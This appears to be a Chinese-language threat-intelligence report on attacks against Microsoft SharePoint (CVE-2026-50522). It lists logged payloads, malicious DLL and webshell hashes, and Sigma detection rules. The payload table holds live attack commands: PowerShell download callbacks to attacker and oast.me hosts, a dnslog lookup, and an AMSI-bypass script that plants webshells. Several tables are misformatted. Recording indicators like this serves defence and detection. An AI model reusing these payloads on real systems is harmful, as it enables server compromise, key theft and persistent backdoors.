Microsoft SharePoint CVE-2026-50522 载荷与分析。
| 请求 | 来源 | User-Agent | 编码 | 唯一 ID | 载荷 |
|---|---|---|---|---|---|
| 816978882 | 45.63.58.216 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 | ' | urn:unique-id:securitycontext:b764f8e60e90450b8629b5ce74fccf82 | powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/b764f8e60e90450b8629b5ce74fccf82' |
| 818198798 | 146.19.216.119 | Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158 | ' | urn:unique-id:securitycontext:2965f1ebb795466c82f01142ca764efa | Main.dll |
| 819557248 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 | " | urn:unique-id:securitycontext:8e1a54521f004b19880a4823bcdd3a94 | ayhmu2nq.dll | |
| 819736316 | 165.154.199.52 | Mozilla/5.0 | ' | urn:uid:f7e4a5a8041648ef88f4befd099b1c61 | eze1fcmh.dll |
| 822026610 | 89.117.94.35 | Python-urllib/3.12 | " | urn:unique-id:securitycontext:77b2293ba0f5464db990f3d2ae402698 | ActivitySurrogateDisableTypeCheck |
| 822026616 | 89.117.94.35 | Python-urllib/3.12 | " | urn:unique-id:securitycontext:401e5797f3864092a836f92976a6506f | edm3ysnc.dll |
| 822486322 | 199.91.221.39 | Mozilla/5.0 (compatible; SPOOB/1.0) | " | urn:unique-id:securitycontext:0e5062c6139e48e3bd951e88b3165a48 | opctzxj4.dll |
检测规则未使用实际日志进行验证。
| 822730890 |
199.91.221.39 |
Mozilla/5.0 (compatible; SPMKScan/1.1) |
" |
urn:unique-id:securitycontext:64ca3f7733c04b8cbcd859e1c08ebb54 |
ko5ybodq.dll |
| 823155656 | 175.137.255.204 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 | " | urn:unique-id:securitycontext:6ae69a0ebb7c4b66b7e8cc6f232a7ce3 | powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://d9k41hj3d47lhf7hbhlg6enhdi7tqb3uk.oast.me/206.255.76.17' |
| 823277752 | 103.151.172.73 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | " | urn:unique-id:securitycontext:ed252fcd4481466d9f70d3a693a9d073 | nslookup 9ac2293c.log.dnslog.pp.ua |
| 823452414 | 38.175.103.78 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0 | " | urn:unique-id:securitycontext:50fe1b81594845f293362037b3b4b32d | `powershell.exe -NoProfile -NonInteractive -Command $ErrorActionPreference='SilentlyContinue';$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if($a){$f=$a.GetField('amsiInitFailed','NonPublic,Static');if($f){$f.SetValue($null,$true)}};$c=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[SNIP ERROR.aspx webshell'));$dirs=@('C:\inetpub\wwwroot\wss\VirtualDirectories','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS');foreach($d in $dirs){if(Test-Path $d){Get-ChildItem $d -Recurse -Directory -ErrorAction SilentlyContinue |
| 824307296 | 190.5.224.135 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 | " | urn:unique-id:securitycontext:0584ba10642c43e2850bff4122a81514 | powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JABFAHIAcgBv[SNIP], `$ErrorActionPreference='SilentlyContinue';$ProgressPreference='SilentlyContinue';$webshellB64='[SNIP default_settings.aspx webshell]';$msg='NOPATH';$done=$false;@('16','15') |
| 文件名 | 文件 hash SHA-256 | 创建时间(UTC) | 备注 |
|---|
14e2gtsh.dll | 8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d | 2026-07-24 03:00:13 | 返回 MachineKeys |
ayhmu2nq.dll | edb087336f22a152d9023416b60ee74db2d30e5df52f2166f5dd1b4ae70aa2eb | 2026-07-24 01:47:55 | 启用带 CompatibilityHttpsListener 的 WinRM,添加用户 sp_admin 并将其加入本地管理员组 |
b4tg4ktk.dll | 824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b9966 | 2026-07-23 07:53:59 | 返回 MachineKeys 和状态码 200 |
bwd0vdqa.dll | afce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb35 | 2026-07-23 02:54:54 | 返回 MachineKeys |
edm3ysnc.dll | 91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb70549 | 2026-07-22 10:54:43 | 返回 MachineKeys |
eze1fcmh.dll | 02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd | 2026-07-24 02:37:59 | 写入 webshell/后门 cmRANDOM.aspx |
hyyavam5.dll | 74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f | 2026-07-26 03:20:01 | |
jflyahz3.dll | 352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be9459151 | 2026-07-23 07:15:43 | 返回 MachineKeys |
ko5ybodq.dll | 249fea110682ff603bf24f9c1147eae73642b186c7a23022d5f824498b8fcd66 | 2026-07-27 14:41:06 | |
Main.dll | 7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec95 | 2055-02-11 11:16:12 | 返回 MachineKeys。该载荷此前在 ToolShell 活动中使用过。 |
obdw11tn.dll | 2ed05c2ff5977047a5aa779510983f7f27b1fde8a0ce6ac8611341eea55f9e37 | 2025-07-29 08:50:39 | 返回 MachineKeys |
opctzxj4.dll | f5c8c39b29d061d72eaefcf1ff19511bdab5d4b3c9849df4ead07dbe61364ee2 | 2026-07-27 15:32:46 | |
tyt0qmyy.dll | 46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d7 | 2026-07-20 08:55:23 | 返回 HTTP 响应头 sec-ch-ua-mobile: ?1 |
z1zkfu55.dll | ab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da012 | 2026-07-26 04:49:55 | |
gzlzbkhj.dll | 52f4af0401258daa9a278710145a9d0d67a35147f0ea136b8868436295348933 | 2026-07-25 14:08:17 | |
qho14tqo.dll | 814db355b4a03fbd6fa138b37a04dd5ff24d9bc5d15e24474f149b220e9c6078 | 2026-07-23 06:58:36 |
| 文件名 | 文件 hash SHA-256 | 备注 |
|---|
cmRANDOM.aspx | 450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511 | Webshell “Helper Tool”,文件名为 cm{RANDOM}.aspx。使用 Assembly.Load(assemblyBytes) 在内存中执行载荷。文件名随机生成。 |
default_settings.aspx | f72a4d95b4c49bb9ffac869d2a30d829f2519d2f6a1a86bcea54dbeffc34f550 | Webshell 位于 TEMPLATE\LAYOUTS 或 \wss\VirtualDirectories\ |
error.aspx | 291dc1f15143c2c87fd2257b6145069914bdffa2f6be9afa63169f8661d9cc4b | Webshell 位于 C:\inetpub\wwwroot\wss\VirtualDirectories、C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS、C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS。 |
layout2sp.aspx | d7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597 | Webshell 位于 \TEMPLATE\LAYOUTS\layout2sp.aspx。 |
| 类型 | 规则 | 备注 |
|---|
| Sigma | DNS Query to External Service Interaction Domains | 检测对类似 .log.dnslog.pp.ua、.oast.me、.oastify.com 的回调域名的出站 DNS 查询。 |
| Sigma | New User Created Via Net.EXE | 检测使用 net.exe 添加的新用户。 |
| Sigma | Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell | 检测通过 WMI 的横向移动。 |
| Sigma | Suspicious File Write to SharePoint Layouts Directory | 检测对 SharePoint 文件夹 \TEMPLATE\LAYOUTS\ 的文件写入。 |
| Sigma | Suspicious PowerShell Parent Process | 检测由 w3wp.exe 生成的进程 powershell.exe。 |
| Sigma | Suspicious Process By Web Server Process | 检测由 w3wp.exe 生成的可疑进程。 |
| Sigma | Suspicious Processes Spawned by WinRM | 检测由 WinRM 主机进程生成的包括 shell 在内的可疑进程。 |
| Sigma | Webshell Detection With Command Line Keywords | 检测通过 web shell 进行侦察活动时常用的某些命令行参数。 |
| Sigma | Webshell Hacking Activity Patterns | 检测来自 w3wp.exe 的某些子进程。 |